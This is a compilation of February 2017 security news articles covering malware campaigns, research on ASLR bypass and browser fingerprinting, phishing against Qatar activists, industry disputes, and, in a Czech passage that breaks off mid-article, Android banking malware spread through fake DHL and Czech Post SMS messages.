Fortinet also points out that this RAT once again shows that one doesn’t have to be an expert to launch fairly sophisticated malware attacks: “More and more applications like Remcos are being released publicly, luring new perpetrators with their easy usage. And all it takes to be infected by one are a few clicks.”
Remcos’ author supposedly attempts to discourage malicious usage of the tool by means of license bans, but only if such misuse is reported. According to Fortinet, such claims are often “nothing but a false shield” that RAT authors use to protect themselves from liability when the application is exposed as a full-blown malware builder.
Study Shows Exposure of Critical Sectors, ICS in U.S.
15.2.2017 Securityweek ICS
A study conducted by Trend Micro using the Shodan search engine provides some useful information on the exposure of critical infrastructure and industrial systems in the United States.
The study, based on a Shodan search performed in February 2016, targeted cyber assets in critical infrastructure and other sectors (e.g. government, emergency, healthcare, utilities, financial services and education), and industrial control systems (ICS), such as the ones used for building automation, manufacturing processes, power generation and traffic system management.
Researchers determined that in the government sector a majority of the exposed cyber assets were firewalls (48%), wireless access points (13%), specialized devices (9%), routers (6%) and other security devices (6%). Several unpatched servers have been found in these organizations, including ones running Apache Tomcat, Microsoft IIS and Apache HTTPD.
The study showed that the number of cyber assets exposed in Washington, DC is smaller than in Lafayette, Indiana, and Saint Paul, Minnesota.
Lafayette and Houston, Texas, have the highest number of exposed cyber assets associated with emergency services, although only a few hundred were discovered in each of these cities.
Firewalls, printers and routers account for a majority of the exposed devices in the emergency services sector. Trend Micro pointed out that vulnerable servers have not been identified in these organizations.
While the healthcare industry has been increasingly targeted by cybercriminals, the Shodan search showed a relatively small number of exposed assets in this sector, mainly firewalls and other security devices. On the other hand, some vulnerable servers were exposed by these organizations. The highest number of exposed assets were identified in Cambridge and New York City.
When it comes to the utilities sector, Trend Micro has determined that the exposed cyber assets are primarily located in small cities and towns. The largest number of devices, which are mainly wireless access points and firewalls, were discovered in Clarksville, Hopkinsville, Braintree, Ocala and Bismarck.
In the financial sector, New York City has the highest number of exposed assets (nearly 15,000), which is not surprising considering that the city is a global financial center. Firewalls and other security devices account for more than 90 percent of the exposed devices in this sector.
The education sector is by far the most exposed, with tens of thousands of assets in Philadelphia, Seattle, Chicago, Los Angeles, Ann Arbor and Austin.
Exposed ICS devices
Trend Micro’s study also focused on exposed industrial systems. The top four most exposed ICS-specific protocols identified by researchers are MODBUS, BACnet, Ethernet/IP and Tridium’s proprietary Fox protocol.
In the case of MODBUS, a popular application layer protocol used for interacting with programmable logic controllers (PLCs), experts identified tens of instances in Fort Lauderdale, Houston, New York and Princeton. Many of these products were BMX processor modules from Schneider Electric.
Instances of BACnet, which is used for building automation and control, were identified in Houston, Chicago and Miami. A majority of the products come from Tridium and Trane.
PLCs made by Rockwell Automation’s Allen-Bradley accounted for a majority of the systems exposing Ethernet/IP.
During its research, the security firm also identified exposed human-machine interfaces (HMI). These systems had not been compromised, but being accessible from the Internet put them at risk. The exposed HMIs were associated with a milling machine, a roller press, a water treatment plant, a conveyor belt, an air-handling system, and a power converter.
Trend Micro has also conducted a separate study focusing on all popular Internet-connected devices in the U.S., including webcams, routers, NAS devices, phones, media players, and web and email servers. The largest number of exposed cyber assets were found in Los Angeles, Houston, Chicago, Dallas, Phoenix, San Jose and New York.
Researchers Break ASLR Protection via JavaScript Attack
15.2.2017 Securityweek Attack
Address space layout randomization (ASLR) protection can be broken via practical attacks using JavaScript without any specific instructions or software features, a newly published research paper claims.
According to a group of researchers from Vrije Universiteit Amsterdam in the Netherlands, ASLR is fundamentally insecure on modern cache-based architectures, although it is used as the main line of defense against memory corruption attacks. Although existing attacks against ASLR rely on software vulnerabilities or on repeated memory probing, simpler attacks are possible, the researchers claim.
In their paper (PDF), the researchers detail a new EVICT+TIME cache attack on the virtual address translation that the memory management unit (MMU) of modern processors performs. The attack, they explain, “relies on the property that the MMU’s page-table walks result in caching page-table pages in the shared last-level cache (LLC),”
Dubbed ASLR⊕Cache, or AnC, the attack allows an actor to derandomize virtual addresses of a victim’s code and data. Because the attack relies only on basic memory accesses, it can be implemented in JavaScript, and researchers demonstrate how such an implementation can break code and heap ASLR in two major browsers (Chrome and Firefox) on Linux systems.
The attack, the researchers explain, relies on the interplay between the MMU and the caches during virtual to physical address translation, a behavior critical to efficient code execution on modern CPUs. The issue, they say, is that modern architectures allow attackers with knowledge to craft memory accesses that manifest timing differences to disclose memory access and infer the bits that make up the address. These timing differences are considered fundamental, reflecting the way caches optimize accesses in the memory hierarchy, the researchers explain.
The AnC attack, the paper says, is applicable to a wide range of modern architectures, including Intel, ARM and AMD, while mitigation without naively disabling caches is hard, because it targets the low-level operations of the MMU. The researchers say that the AnC attack was possible on all of the tested architectures and that all, except for ARMv7, allowed them to fully derandomize ASLR.
The researchers also explain that an on-going AnC attack can be detected using performance counters, although this type of defense is prone to false-positives. Partitioning the shared LLC can also be used, though with performance impact, while reducing the accuracy of the timers to make it harder for attackers to differentiate between cached and memory accesses is often costly to implement. AnC can also be mitigated through caching PT entries in a separate cache rather than the data caches.
“The conclusion is that such caching behavior and strong address space randomization are mutually exclusive. Because of the importance of the caching hierarchy for the overall system performance, all fixes are likely to be too costly to be practical. Moreover, even if mitigations are possible in hardware, such as separate cache for page tables, the problems may well resurface in software. We hence recommend ASLR to no longer be trusted as a first line of defense against memory error attacks and for future defenses not to rely on it as a pivotal building block,” the paper concludes.
FireEye Becomes AV Replacement, Adds macOS Support
15.2.2017 Securityweek Apple
SAN FRANCISCO – RSA CONFERENCE 2017 - Cyber threat protection and intelligence firm FireEye today unveiled major updates to its endpoint security platform, including two new protection engines and support for Apple’s macOS systems.
The new capabilities are the first of several no-cost upgrades for FireEye Endpoint Security customers that are coming in 2017, the company says.
As part of the latest FireEye Endpoint Security platform, a new “Exploit Guard” engine leverages behavioral analysis capabilities to detect known threats, while a new partnership integrates Bitdefender’s anti-malware engine to protect against more traditional commodity malware. The combination allows FireEye Endpoint Security to serve as an Anti-Virus replacement with a single agent that can satisfy compliance requirements.
FireEye Endpoint SecurityThe company claims that its behavioral analysis engine that powers the new Exploit Guard feature, has in testing environments, been able to detect and block nearly all the previously unknown exploits – without signatures or indicators – that were publicly reported over the past three years.
“We took every zero-day exploit that affected Windows machines from 2014, 2015 and 2016 and fed them into this engine,” FireEye CTO Grady Summers told SecurityWeek at the company’s recent internal Momentum 2017 conference. Summers, who previously served as CISO at GE, explained that FireEye pulled down all the ransomware and exploit kits they could find on Virus Total and were able to achieve a 99.74% efficacy (detection) rate with no signatures or prior knowledge.
The company boasts an advantage of continually responding to high profile breaches around the world via its Mandiant team, where incident responders and analysts are able to see where other products fail. The company says that in Q4 2016, Mandiant responded to more security breaches than in any prior quarter in the company’s history.
"Well over 80 percent of the time, if I'm reading a headline, we are there," Kevin Mandia, CEO at FireEye, told SecurityWeek in a meeting at the Momentum Conference last month . "That makes me feel good."
“At FireEye, our security innovation begins at the breach. Because we own that moment, we get to witness firsthand how attackers evade other security safeguards – including 'next gen' endpoint – and this allows us to innovate at the speed of attackers,” Kara Wilson, Chief Marketing Officer at FireEye, wrote in a blog post.
In addition to insights gained from the Mandiant Incident Response team, context from FireEye iSIGHT Intelligence helps security teams prioritize and triage threats, the company says.
“FireEye Endpoint Security is built to speed up and simplify endpoint protection and response with high-fidelity alerts, context from FireEye iSIGHT Intelligence, and forensic and investigation capabilities scaled to hundreds of thousands of endpoints,” the company explains. “This seamless integration of prevention, detection and response capabilities in a single agent also greatly simplifies the customer deployment and lowers the performance impact on the endpoint.”
These new capabilities are generally available to customers globally immediately.
The integration of Bitdefender's anti-virus engine is expected to occur during the first quarter of 2017, with additional roll-out of other detection and prevention capabilities following later this year.
In addition to the recently added support for macOS endpoints, support for Linux servers will be added later in 2017. Other enhancements coming this year will include virtual and cloud form factors and expanded behavioral analysis and machine learning capabilities to protect against unknown malware and exploits.
After seeing its stock price decline significantly over the past years, along with major executive leadership changes, FireEye is betting on new products and partnerships to help improve its position in the cybersecurity solutions market.
In late 2016, FireEye launched new cloud-based network security and threat intelligence offerings. The company also announced a deal with Microsoft that allows Windows Defender Advanced Threat Protection (WDATP) users to gain access to FireEye's iSIGHT adversary based intelligence.
In November 2016 the company unveiled FireEye Helix, a new platform designed to help customers efficiently integrate and automate security operations functions and accelerate incident response.
In December 2016, FireEye and the NATO Communications and Information Agency (NCI) announced an information sharing partnership, under which the two organizations will exchange non-classified technical information related to cyber threats and vulnerabilities.
“The investments we are making in 2017 for our customers in Endpoint Security are significant, as it is a core component of the FireEye Helix platform and a huge opportunity for our business,” Mandia said in a statement.
Cyber Skills Shortage May Require Employers to Change Course: Report
15.2.2017 Securityweek Cyber
The cyber security skills gap is known and documented, and empirically understood by all enterprise security leaders. It was recently quantified by job site Indeed.com, which measured the difference between available positions and market interest in them. A new report from ISACA titled Current Trends in Workforce Development (PDF) now seeks to understand the shortcomings in the available applicants, and what can be done by enterprises to minimize the effect of skills shortage.
The report is the first released part of ISACA's State of Cyber Security 2017 survey. 633 ISACA members responded to an online questionnaire, representing more than 20 industries and all five major geographical regions. North America and Eurasia provided 85% of the respondents in almost equal measure. Technology services at 28%, and finance/banking at 23% provided more than half of the total industry sectors.
The effect of the skills shortage is severe, with more than 25% of enterprises taking more than 6 months to fill a security vacancy. Only 59 percent of the organizations say they receive at least five applications for each cyber security opening, and only 13 percent receive 20 or more. This compares to the 60 to 250 applications for the majority of non-security job openings.
The survey finds that the "main problem of obtaining key talent in the realm of cyber security stems from a lack of qualified applicants." This is a serious issue that goes beyond the trivial chicken and egg explanation. Cyber security is such a rapidly evolving area that new skills are required almost as soon as schools and colleges begin to train for old requirements.
Threat hunting analysts are a prime example. All security technologies generate huge logs. Those logs contain, somewhere, the subtle indications of system compromise. But it requires a human analyst with a particular set of skills to be able to hunt through a myriad of log alerts to be able to detect the few genuine issues from a mass of false positives.
This is a relatively new development in cyber security. It stems from the rapidly growing use AI and machine-learning algorithms designed to detect anomalies. They work on the basis of a probability score rather than a binary malicious/not malicious decision. A human analyst is required to make the final decision on the probable; and third-party threat-hunting training is in short supply.
Even when trained threat hunters enter the marketplace, they will do so without practical experience. However, more than half (55%) of the respondents report that practical, hands-on experience is the most important cyber security qualification. Employers are simply demanding the impossible: anybody already possessing both qualifications and experience has got that experience by being in employment. It becomes a question of poaching rather than recruiting, with the inevitable result that skills move upwards towards the bigger and better financed enterprises, magnifying the problem for small and medium companies without doing anything to solve the basic problem.
Even within the low number of applicants, 25% of respondents say today's cyber security candidates are lacking in technical skills; while 45% do not believe most applicants understand the business of cyber security.
ISACA offers several recommendations to help employers find, assess and retain qualified cyber security talent. In locating talent, it suggests looking internally, and/or looking in a different direction externally. Internally, it suggests that employers should "Groom employees with tangential skills -- such as application specialists and network specialists -- to move into cyber security positions." This solves the technical skills problem (these employees will already possess them) while experience can be gained 'on the job'.
Externally it recommends a path already taken by many organizations: engage with and cultivate students and career changers. "An outreach program to a university or an internship program can help with this," it says.
ISACA also recommends automation wherever possible. "Where security operational tasks can be automated, it can decrease the overall burden on staff and thereby help make best use of the staff that an organization already has."
The ISACA report will be discussed at the RSA Conference, on Thursday, February 16th. A CISO panel including four ISACA leaders will discuss "State of Cybersecurity: Overcome Workforce Challenges, Build a Skilled Team."
Russian Black Hat Hacks 60 Universities, Government Agencies
15.2.2017 Securityweek Cyber
A Russian-speaking black hat hacker has breached the systems of more than 60 universities and U.S. government agencies, according to threat intelligence firm Recorded Future.
The hacker, tracked by the company as “Rasputin,” typically exploits SQL injection vulnerabilities to gain access to sensitive information that he can sell on cybercrime marketplaces.
Rasputin is the hacker who last year breached the systems of the U.S. Election Assistance Commission (EAC) and attempted to sell more than 100 access credentials, including ones providing administrator privileges. Researchers found evidence that he had been negotiating with a potential buyer representing a Middle Eastern government.
Recorded Future has been monitoring the hacker’s activities and identified many of his victims, including over two dozen universities in the United States, ten universities in the United Kingdom, and many U.S. government agencies.
The list of targeted government agencies includes local, state and federal organizations. The targeted federal agencies are the Postal Regulatory Commission, the Department of Housing and Urban Development, the Health Resources and Services Administration, and the National Oceanic and Atmospheric Administration.
There are plenty of free tools that can be used to find and exploit SQL injection vulnerabilities, including Havij, Ashiyane SQL Scanner, SQL Exploiter Pro, SQLI Hunter, SQL Inject Me, SQLmap and SQLSentinel. However, Rasputin has been using a SQL injection tool that he developed himself.
“Financial profits motivate actors like Rasputin, who have technical skills to create their own tools to outperform the competition in both identifying and exploiting vulnerable databases,” said Levi Gundert, VP of intelligence and strategy at Recorded Future.
Experts believe Rasputin picks his targets based on their perceived investment in security controls and the potential value of the stolen data. The personal information stored in the targeted organizations’ databases can be highly valuable, particularly if the data is associated with users in North America and Western Europe.
Recorded Future pointed out that while SQL injection vulnerabilities have been around for a long time and can be easily prevented through basic secure coding practices, addressing these types of flaws can often be costly.
“The problem and solution are well understood, but solutions may require expensive projects to improve or replace vulnerable systems. These projects are often postponed until time and/or budget is available, until it’s too late to prevent SQLi victimization,” said Gundert.
CrowdStrike Sues NSS Labs to Prevent Publication of Test Results
15.2.2017 securityweek Security
CrowdStrike filed suit against NSS Labs
On February 10, 2017, next-gen endpoint protection firm CrowdStrike filed suit against security product testing firm NSS Labs, and sought a temporary restraining order to prevent publication of CrowdStrike comparative test results. On February 13, the injunction was denied by the District Court of Delaware. On February 14, NSS published the results as part of its Advanced Endpoint Protection Group Test Results.
CrowdStrike explained the background in a blog post yesterday. It filed suit, it said, to hold NSS "accountable for unlawfully accessing our software, breaching our contract, pirating our software, and improper security testing. Regardless of test results (which we have not seen), CrowdStrike is making a stand against what we believe to be unlawful conduct."
CrowdStrike had earlier commissioned NSS to undertake a private test of its products, but was dissatisfied with the test methods, calling them "deeply flawed". Because of this it decided not to participate in the subsequent public test, and prohibited NSS from using its software. But according to CrowdStrike, NSS "colluded with a reseller and engaged in a sham transaction to access our software to conduct the testing. In doing so, NSS breached their contract with CrowdStrike, violated our end user licensing agreement (EULA), misappropriated our intellectual property, and improperly used credentials. Once we became aware that an unauthorized user account associated with a reseller was used for the tests, we suspended access immediately. Any test results that NSS did obtain are incomplete and materially flawed."
Product testing has long been a problem for the newer endpoint protection companies. In June 2016, Sophos blasted Cylance, and added, "when the playing field is leveled, and Cylance's product comes under real scrutiny, the company cries foul, puts the fear of lawsuits into the minds of its partners, and accuses others of 'smoke and mirrors' tactics."
Now the threat of a lawsuit has become a reality between CrowdStrike and NSS Labs. In the meantime, many of the new endpoint protection companies, including Cylance, have modified their attitudes. Cylance was amongst the tested products, as was SentinelOne and Invincea. These last three did rather well in the overall scores: Cylance at 99.69%, SentinelOne at 99.79%, and Invincea at 99.49%. CrowdStrike did less well at 74.17% -- but as CrowdStrike claimed, the results 'are incomplete'; and as NSS Labs admits, "The Falcon Host's final rating may have been different had it completed the test."
There are two primary issues here: is it possible to conduct fair comparative tests for advanced endpoint protection products (aka, machine-learning or next-gen AV); and is the law a valid method of preventing them?
Opinions differ on the first. David Harley blogged in WeLiveSecurity on Monday (although I understand it was written well before this current issue): Next-gen security software: 'Myths and marketing'. Quoting a question I asked him months ago (basically, is there any way to compare 1st- and 2nd-gen AV products), he said, "yes, of course there is."
Vesselin Bontchev, who is possibly the ultimate culprit ("I practically invented independent competent anti-virus testing while I was working at the Virus Test Center at the University of Hamburg in the early '90s") takes the opposite view. He believes that neither products nor testing are anywhere near as competent as they should be. "Whenever there is a major conflict, like this CrowdStrike vs NSS Labs story," he wrote yesterday, "you can usually bet that both sides are in the wrong. CrowdStrike probably have a crappy product they want to sell and didn't like the test results, while NSS Labs probably has a crappy and/or incomplete testing methodology and CrowdStrike found some legitimate flaws in it."
The law, however, is a heavy instrument to prevent public testing. SecurityWeek asked NSS to comment, and was told via email by CEO Vikram Phatak, "While CrowdStrike's request for a Temporary Restraining Order and Preliminary Injunction were denied by the Federal court, they are still suing us at present, and so we are limited in what we can say. Whether or not it is their intent, their suit has the effect of keeping us from debating the facts publicly.
"We obviously disagree and are disappointed with CrowdStrike's characterization of NSS as portrayed in their recent blog post... And as far as Crowdstrike's suit against NSS, we believe the judge's ruling and memorandum speak for themselves."
SecurityWeek also approached CrowdStrike, the Anti-Malware Testing Standards Organization (of which both CrowdStrike and NSS Labs are members), and another independent test lab for comments. We have so far received no response (although an informal reply from CrowdStrike did say, "Things are moving quickly today. Keep an eye on your inbox for an update"). If any comments are received they will be added as an update to this post.
Meanwhile, customers are left with an ongoing problem: can test results be trusted? There is no easy answer to this. The best solution is for customers to insist on an on-site trial periods to see whether a preferred solution is actually up to the job.
Amnesty Warns of Phishing Attacks on Qatar Activists
15.2.2017 securityweek Phishing
Human rights watchdog Amnesty International has uncovered a sophisticated phishing campaign targeting journalists, activists and other entities in Nepal and Qatar interested in migrants' rights.
The campaign, dubbed Operation Kingphish, involves an online persona named “Safeena Malik” – Malik can mean “king” in Arabic. Amnesty International learned that Safeena Malik had contacted several individuals via email and social media over the course of 2016.
Safeena Malik, who claimed to be an activist interested in human rights, had accounts on several social media websites, including Twitter, Facebook and LinkedIn. “She” reached out to dozens of people, many involved in the issue of migrants’ rights in Qatar.
Qatar has attracted the attention of several human and labor rights organizations for its exploitation of migrant workers, many of which are from Nepal. Some of the documented cases are related to the construction of stadiums and infrastructure for the FIFA World Cup competition that will be hosted by Qatar in 2022.
According to Amnesty, many of the attacks launched using the fake Safeena Malik profiles attempted to lure targeted individuals to realistic Google phishing pages. In order to avoid raising suspicion, the phishing pages displayed the email address and profile picture of the targeted user, and a legitimate document was displayed once the password had been handed over to the attacker.
Documents on human trafficking and ISIS funding, and fake Google Hangouts invitations were used to lure targeted users to the phishing pages. Safeena Malik also sent out private messages on Facebook to obtain the Gmail addresses of the targets.
The persona had hundreds of connections on social media and often joined groups focusing on migrant workers and forced labor in an effort to identify potential targets and make it appear as if “she” was part of the community.
Amnesty identified 30 different targets by analyzing the profile pictures hosted on the server used by the attacker to deliver the phishing pages, although the organization believes the actual number is much higher.
“Most identified targets were activists, journalists, and labour union members. While some of targets had published critical opinions about Qatar’s international affairs, the majority of identified targets were affiliated with organisations supporting migrant workers in Qatar,” said activist and security researcher Claudio Guarnieri. “Interestingly, a significant number of them are from Nepal, which is one of the largest nationalities amongst migrant workers in Qatar, and a country that has featured prominently in the migrant worker narrative on Qatar.”
While experts could not find too much evidence, they believe the attacks were likely carried out by a state-sponsored actor. One of the IP addresses used to access some of the compromised email accounts had been associated with an ISP headquartered in Doha, Qatar.
However, when contacted by Amnesty, the government of Qatar denied any involvement and expressed interest in stopping the attacks. Experts pointed out that the operation could be the work of an actor that seeks to damage Qatar’s reputation.
This is not the only social engineering campaign targeting human and labor rights organizations focusing on the situation in Qatar. In December, Amnesty International published a report detailing a fake human rights organization named Voiceless Victims. It is unclear if the two campaigns are directly connected.
Websites Can Now Track You Online Across Multiple Web Browsers
15.2.2017 thehackernews Security
You might be aware of websites, banks, retailers, and advertisers tracking your online activities using different Web "fingerprinting" techniques even in incognito/private mode, but now sites can track you anywhere online — even if you switch browsers.
A team of researchers has recently developed a cross-browser fingerprinting technique — the first reliable technique to accurately track users across multiple browsers based on information like extensions, plugins, time zone and whether or not an ad blocker is installed.
Previous fingerprinting methods usually only work across a single browser, but the new method uses operating system and hardware level features and works across multiple browsers.
This new fingerprinting technique ties digital fingerprint left behind by a Firefox browser to the fingerprint from a Chrome browser or Windows Edge running on the same device.
This makes the method particularly useful to advertisers, enabling them to continue serving targeted advertisements to online users, even if they avoid them by switching browsers.
The new technique can be found in a research paper titled (Cross-)Browser Fingerprinting via OS and Hardware Level Features [PDF] by Lehigh University’s Yinzhi Cao and Song Li, and Washington University in St. Louis’ Erik Wijmans.
The cross-browser fingerprinting technique relies on "many novel OS and hardware features, especially computer graphics ones" that are slightly different for each computer.
For example, the technology can be used to identify the machine by performing 20 unique WebGL tasks while rendering 3D graphics in web browsers with carefully selected computer graphics parameters, such as texture, anti-aliasing, light, and transparency.
In total, 36 new features work independently of a particular browser, although they are not confined to one specific web browser on the machine.
The features tested currently includes time zone, number of CPU cores, GPU, hash values of GPU rendering results, plugins, fonts, audio, screen ratio and depth, WebGL, Ad blocking, canvas, cookies, encoding, and language.
The researchers provided both a practical demonstration as well as open source code online on GitHub. They performed a test which involved 3,615 fingerprints and 1,903 users and found that their method successfully identified 99.2% of users.
On the other hand, a single-browser fingerprinting technique called AmIUnique had a success rate of 90.8%.
"This approach is lightweight, but we need to find all possible fingerprintable places, such as canvas and audio context: If one place is missing, the browser can still be somehow fingerprinted. We leave it as our future work to explore the correct virtualization layer," the paper notes.
The researchers also noted that this new cross-browser fingerprinting technique is not too bad, as in some cases, the method can be used as part of stronger multi-factor user authentications across multiple browsers.
For example, Banks can use this technique to check if a user logging into an online account is using the computer that has been used on every previous visit, making sure the login was legitimate even if the user is using a different machine to usual.
The researchers plan to present their paper at the Network and Distributed System Security Symposium scheduled for February 26 through March 1 in San Diego, California.
Russian Cyberspies Use New Mac Malware to Steal Data
15.2.2017 securityweek Apple
Researchers have discovered a new piece of malware used by the Russia-linked threat group known as APT28 to steal sensitive data from Mac devices, including backups and passwords.
APT28 is also tracked as Fancy Bear, Pawn Storm, Sofacy, Tsar Team, Strontium and Sednit. The threat actor has been linked to several high-profile attacks aimed at government and other types of organizations around the world, including the recent election-related hacker attacks in the United States.
APT28 has been known for using an OS X downloader named Komplex, and researchers from Bitdefender and Palo Alto Networks have now come across another Mac malware believed to be part of the group’s arsenal.
XAgent, or X-Agent, is a Trojan used by APT28 in attacks targeting Windows systems. A recently analyzed campaign aimed at Ukraine indicates that the group may have also developed an Android version of XAgent.
Bitdefender and Palo Alto Networks have also identified a macOS version of XAgent, which they believe is downloaded to targeted systems by the Komplex downloader. Both security firms determined, based on binary strings, that Komplex and XAgent were likely created by the same developer.
Once it infects a Mac computer, the malware, which its authors call XAgentOSX, contacts a command and control (C&C) server and waits for instructions. C&C communications are similar to the ones used by the Windows version of XAgent.
XAgentOSX can collect information about the system, running processes and installed applications, it can download and upload files, execute commands and files, and take screenshots.
The malware also looks for backup files from an iPhone or iPad, which it can exfiltrate using one of the available commands. XAgentOSX can also log keystrokes, allowing the attackers to obtain the victim’s credentials.
Bitdefender told SecurityWeek that it does not have any information on XAgentOSX infections and targets, but the company believes the victims are hand-picked in an effort to prevent the exposure of malware samples.
“Most likely, this sample is directed at the same audience that makes the focus of the APT28 group (government, airspace, telecom and, e-crime services). It most likely covers the instances in which targets in the respective groups use Macs as work or personal computers,” said Bogdan Botezatu, Senior E-Threat Analyst at Bitdefender.
APT28 is a sophisticated threat group whose arsenal includes a wide range of tools, including Linux malware. One of the actor’s favorite Linux tools is Fysbis, an unsophisticated yet efficient backdoor.
Signal introduced the Video call feature in public beta release
15.2.2017 securityaffairs Apple
Signal, the most secure instant messaging app, introduced the Video call feature in public beta release. You can test is now!
Signal is considered the most secure instant messaging app, searching for it on the Internet it is possible to read the Edward Snowden’ testimony:
“Use anything by Open Whisper Systems” Snowden says.
The Cryptographer and Professor at Johns Hopkins University Matt Green and the popular security expert Bruce Schneier are other two admirers of the Signal app
News of the day is that the Signal app released video calling feature on Tuesday for both Android and iOS.
The new feature will allow Signal users to make face-to-face through video calling with a specific focus on security.
The Signal video calling feature implements the support for CallKit on iOS 10 devices, a recently introduced framework that lets users’ VoIP app integrate tightly with the native Phone UI.
The Callkit in iOS 10 allows Signal users to answer calls just like regular calls, but there are some specific privacy issues that must be carefully considered.
“CallKit offers a native calling experience to VoIP apps like Signal. As well as being able to answer calls directly from your lock screen, you’ll also see Signal calls in the system’s “Recent Calls” list. This is because iOS treats CallKit calls like any other call, however that also means some information will be synced to iCloud if enabled. This information includes who you called and how long you talked.” wrote Moxie Marlinspike.
CallKit could be disabled by Signal iOS users to enhance the privacy.
The Signal’s video calling feature is still in beta, in order to make a video call both users will have to enable the feature.
If you wan to try the new feature go into your Signal settings and enable ‘Video calling beta’ under ‘Advanced.’
“If you decide that’s not for you, you can opt-out of the CallKit features at any time in Settings > Advanced > Use CallKit, while continuing to use the rest of the new calling system.” continues Moxie Marlinspike.
Operation Kingphish: Cyber Attacks against human rights activists in Qatar and Nepal
15.2.2017 securityaffairs Cyber
Amnesty International has recently uncovered a spear phishing campaign dubbed Operation Kingphish that targeted groups in Qatar and Nepal.
Human rights organizations and journalists continue to be a privileged target of phishing campaigns that attempt to steal the Google credentials of the victims. The malicious messages try to lure victims into viewing documents online.
Amnesty International has recently uncovered a spear phishing campaign that targeted groups in Qatar and Nepal leveraging a fake social media profile, the attackers did not directly hit people working for Amnesty International.
Threat actor created a fictional rights activist named Safeena Malik.
Amnesty International dubbed the phishing campaign ‘Operation Kingphish’ because the surname “Malik” translates from Arabic as “King.”
“Over the course of 2016 — and particularly intensifying towards the end of the year — several individuals known to Amnesty International were approached via email and through social media by “Safeena Malik”, seemingly an enthusiastic activist with a strong interest in human rights.” reads a blog post published by popular researcher Claudio Guarnieri on Medium. “What lied beneath this facade was a well-engineered campaign of phishing attacks designed to steal credentials and spy on the activity of dozens of journalists, human rights defenders, trade unions and labour rights activists, many of whom are seemingly involved in the issue of migrants’ rights in Qatar and Nepal.”
The threat actors created profiles for the character “Safeena Malik” on every social media, including Facebook, Google, LinkedIn, and Twitter. The information used by the attackers seems to have been harvested from another social media account.
“The various social media accounts communicated regularly with several of the victims we identified, often for many months. It appears that the attackers may have impersonated the identity of a real young woman and stole her pictures to construct the fake profile, along with a professional biography also stolen from yet another person.” added Claudio Guarnieri.
Among the various profiles created for Safeena Malik, the most active appear to be the Facebook and LinkedIn once. (where the identity had accumulated more than 500 connections).
The LinkedIn profile has built a network composed of more than 500 connections. The attackers targeted individuals associated with the rights of migrant workers in Qatar, journalists, activists, and labor union officials.
A large number of workers from Nepal and other countries have been brought to Qatar to work with companies involved in the construction of stadiums and facilities for the 2022 World Cup, so human rights activists are concerned over the treatment of those workers. It has been estimated that more than 1,200 migrant workers from Nepal and India have already died.
Victims of the spear phishing campaign received malicious email and social media messages from “Safeena Malik,” who was asking them to view the content of documents or presentations on Qatari human rights issues.
In other cases, the attackers were offering forged requests to link up via Google’s Hangouts chat service.
The phishing messages included links to a phishing site crafted specifically trick visitors into providing their Google login credentials. Once the victims provided the credentials, they were redirected to an actual Google Docs document pilfered from another source to avoid suspicions.
Who is behind the Operation Kingphish?
“in the absence of clear evidence, trying to identify the entity behind this attack can only be speculative. ” states Guarnieri.
Despite the lack of conclusive evidence, the fact that the spear phishing attacks specifically target individuals active on human rights issues in Qatar, suggests the involvement of a state-sponsored actor. We believe it is also possible that these attacks have been orchestrated by contractors.
“We believe it is also possible that these attacks have been orchestrated by contractors.” concluded Guarnieri.
The Qatari government has denied involvement in the Operation Kingphish campaign.
Na české uživatele Androidu míří další vlna malwaru. Co vir Android/Spy.Banker.HO dokáže?
15.2.2017 Živě.cz Android
Do Česka dorazila další vlna falešných aplikací, tentokrát se vydávají za DHL
Za cíl mají krádež přihlašovacích údajů do bankovnictví
Jak se těmto podvodům bránit?
Minimálně od poloviny ledna narážíme každý týden na několik upozornění před škodlivou aplikací pro Androidy, kterou útočníci šíří pomocí SMS. Nejčastěji rozesílají zprávy vydávající se za některou z českých bank, nicméně problémům se nevyhnula ani Česká pošta, e-shop Alza a nejnovější případ se týká přepravní společnosti DHL.
Vzorec útoku je vždy stejný: uživateli dorazí SMS s textem vztahující se k danému subjektu a požadavkem na stáhnutí aplikace. Falešné zprávy od České pošty tak obsahovaly výzvu k vyzvednutí zásilky na depu, u bank útočníci nejčastěji používají variantu s důležitým sdělením, jež má být přečteno právě v odkazované aplikaci, u Alzy slibují výhru a u DHL nabízí v aplikaci změnu doručovací adresy pro dodání balíku.
Dvě aplikace, stejný malware. Jednou se vydává za aplikaci České pošty, podruhé za DHL, ve většině případů však nese název Flash Player 10 Update
Prvním poznávacím prvkem podvodné aplikace může být už adresa, z níž má být stažena. Doposud totiž útočníci vždy použili doménu .online – u Alzy to byla adresa http://alza-shop.online, u DHL je to nyní http://dhl-express.online a u pošty využívali útočníci líbivou adresu http://ceskaposta.online. I díky těmto URL se mohou zprávy pro mnohé uživatele tvářit jako legitimní.
Takto může vypadat podvodná zpráva, tahle se konkrétně vydává za Českou poštu (foto: @TerezaChlubna)
Dalším společným rysem těchto podvodných aplikací je jejich minimální velikost. Při stahování instalačního balíku APK to je vždy pod 1 MB, po instalaci se potom u všech zmíněných verzí velikost pohybovala kolem 1,4 MB. Při spuštění si aplikace samozřejmě vyžádá všechna oprávnění v systému, a pokud je uživatel odsouhlasí, umožní aplikaci nejen přístup do kontaktů, ale například i možnost číst a odesílat zprávy.
Aplikace si vyžádá kompletní systémová oprávnění díky nimž se později může dostat například k ověřovací SMS pro přihlášení do bankovnictví
Základní obranou proti tomuto typu útoku by však měla být především obezřetnost a také zdravý rozum. Pokud uživatel nečeká zásilku od České pošty či DHL nebo mu přijde zpráva z banky, u níž není klientem, je podvod nejpravděpodobnější variantou. Problémem může být například zpráva z Alzy slibující výhru při instalaci aplikace, kdy podobné způsoby promování svých aplikací by mohly některé společnosti opravdu využívat. U všech variant by však mělo platit základní pravidlo neinstalovat aplikace z cizích zdrojů a spoléhat se na integrovaný obchod Google Play.
Podvržené bankovnictví
Pokud uživatel aplikaci nainstaluje, ta běží na pozadí a čeká na svoji příležitost až bude moci naservírovat podvodný přihlašovací formulář do internetového bankovnictví. To se může stát nejen při spuštění samotné podvodné aplikace, ale i při spuštění dalších služeb. Jedna z variant malwaru Android/Spy.Banker tak zobrazovala formulář pro zadání platebních údajů při každém spuštění některého z komunikátorů – Skype, Facebook Messengeru, Hangouts, ale i u sociálních sítí jako je Instagram nebo Twitter.
Aplikace může zobrazovat také formuláře pro zadání údajů platební karty (foto: Fortinet)
